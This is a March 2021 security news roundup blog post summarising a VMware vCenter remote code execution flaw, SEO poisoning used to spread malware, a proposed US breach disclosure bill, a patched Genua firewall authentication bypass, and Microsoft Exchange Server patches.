Security Wrap-Up (March 2nd, 2021)

Welcome back to the Security Wrap-Up! Last week was somewhat eventful, with a fairly hefty VMware vulnerability. Let’s check it out -

VMware servers exposed to critical RCE bug
Although this was mentioned in a thread last week, I thought it was worth discussing here as well. VMware has patched three vulnerabilities in its virtual-machine infrastructure for data centers, the most serious of which is a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system to find other vulnerable points of network entry to take over affected systems. The most critical of the flaws, which is being tracked as CVE-2021-21972, was found in a vCenter Server plugin for vROPs in the vSphere Client functionality, according to an advisory posted online Tuesday by VMware. VMware has advised customers to install all updates provided to affected deployments to remediate the threat the vulnerabilities pose. The company also provided workarounds for those who can’t immediately update their systems.

Hackers exploit websites to boost SEO before deploying malware
Cyberattackers have turned to search engine optimization (SEO) techniques to deploy malware payloads to as many victims as possible. According to Sophos, the so-called search engine “deoptimization” method includes both SEO tricks and the abuse of human psychology to push websites that have been compromised up Google’s rankings. These threat actors are now tampering with the content management systems (CMS) of websites to serve financial malware, exploit tools, and ransomware.

Bipartisan lawmakers announce breach disclosure bill
At a joint hearing of the House Oversight and Homeland Security Committee about the SolarWInds-related espionage campaign, Rep. Michael McCaul (R-TX) said that he and Rep. Jim Langevin (D-RI) are working on legislation to require companies to notify the federal government after similar breaches. While McCaul had no further detail on what the proposal would be, much of a hearing on Friday was devoted to how these kinds of laws might work.

Firewall vendor patches critical auth bypass flaw
Cybersecurity firm Genua fixes a critical flaw in its GenuGate High Resistance Firewall, allowing attackers to login as root users. If exploited, the vulnerability could allow local attackers to bypass authentication measures and login to internal company networks with the highest level of privileges. Researchers contacted Genua on Jan. 29th regarding the vulnerability. On the same day, they confirmed the issue and began working on a patch, releasing a patch for the affected product on Feb. 2nd.

And in the past few hours that I’ve drafted this, another big piece of security news has come through. Microsoft has released patches for four critical vulnerabilities being used to target on-premises versions of Microsoft Exchange Server. Microsoft is urging customers to patch ASAP - https://www.darkreading.com/threat-intelligence/microsoft-urges-businesses-to-patch-critical-exchange-server-flaws/d/d-id/1340305